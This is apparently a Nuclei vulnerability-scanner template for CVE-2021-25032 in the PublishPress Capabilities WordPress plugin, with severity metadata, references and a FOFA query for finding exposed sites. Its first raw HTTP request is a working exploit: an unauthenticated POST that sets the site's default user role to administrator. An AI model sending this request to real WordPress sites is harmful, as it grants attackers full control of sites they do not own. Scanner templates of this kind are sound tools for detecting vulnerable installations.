id: CVE-2021-25032

info:
  name: PublishPress Capabilities < 2.3.1 - Missing Authorization
  author: ritikchaddha
  severity: critical
  description: |
    The PublishPress Capabilities plugin for WordPress before 2.3.1 does not have proper authorization and CSRF checks when updating settings via the init hook, allowing unauthenticated attackers to update arbitrary blog options, such as setting the default role to administrator.
  impact: |
    Unauthenticated attackers can update arbitrary WordPress options including setting the default user role to administrator, leading to complete site compromise through privilege escalation.
  remediation: |
    Update the PublishPress Capabilities plugin to version 2.3.1 or later.
  reference:
    - https://wpscan.com/vulnerability/2f0f1a32-0c7a-48e6-8617-e0b2dcf62727/
    - https://plugins.trac.wordpress.org/changeset/2640161
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25032
    - https://github.com/RandomRobbieBF/CVE-2021-25032
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-25032
    cwe-id: CWE-352
    epss-score: 0.81889
    epss-percentile: 0.99227
    cpe: cpe:2.3:a:publishpress:capabilities:*:*:*:*:-:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: publishpress
    product: capabilities
    framework: wordpress
    fofa-query: body="/wp-content/plugins/capability-manager-enhanced"
  tags: wpscan,cve,cve2021,wordpress,wp-plugin,wp,capability-manager-enhanced,authenticated,vkev,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        page=pp-capabilities-settings&all_options=default_role&default_role=administrator

      - |
        POST /wp-login.php?redirect_to=http%3A%2F%2F{{Hostname}}%2Fwp-admin%2Foptions-general.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=pp-capabilities HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - "selected'> Administrator"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220179d0dd8a710a5646a400574184c65750af780895fe4a4000f7baad7c6fc7cb2022100969baf8c2ace94d11951aa3e84511472e9809869483dd358d0fde03ac002a471:922c64590222798bb761d5b6d8e72950